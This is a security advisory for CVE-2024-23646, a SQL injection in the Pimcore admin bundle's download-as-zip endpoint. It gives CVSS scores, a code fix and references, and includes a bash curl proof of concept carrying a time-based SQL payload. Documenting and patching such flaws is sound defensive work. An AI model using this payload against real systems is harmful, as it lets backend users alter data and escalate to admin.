8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.3 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
25.4%
The application allows to create zip files from available files on the site. The parameter “selectedIds”, is susceptible to SQL Injection.
downloadAsZipJobsAction escape parameters, but downloadAsZipAddFilesAction not.
The following code should be added:
foreach ($selectedIds as $selectedId) {
if ($selectedId) {
$quotedSelectedIds[] = $db->quote($selectedId);
}
}
X-pimcore-csrf-token
header from any request to the backend, as well as the PHPSESSID
cookie.#!/bin/bash
BASE_URL=http://localhost # REPLACE THIS!
CSRF_TOKEN="5133f9d5d28de7dbab39e33ac7036271284ee42e" # REPLACE THIS!
COOKIE="PHPSESSID=4312797207ba3b342b29218fa42f3aa3" # REPLACE THIS!
SQL="(select*from(select(sleep(6)))a)"
curl "${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093&id=1&selectedIds=1,${SQL}&offset=10&limit=5&jobId=655cb18a37b01" \
-X GET \
-H "X-pimcore-csrf-token: ${CSRF_TOKEN}" \
-H "Cookie: ${COOKIE}" `
Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.
github.com/pimcore/admin-ui-classic-bundle
github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006
github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087
github.com/pimcore/admin-ui-classic-bundle/commit/363afef29496cc40a8b863c2ca2338979fcf50a8
github.com/pimcore/admin-ui-classic-bundle/releases/tag/v1.3.2
github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-cwx6-4wmf-c6xv
nvd.nist.gov/vuln/detail/CVE-2024-23646
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.3 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
25.4%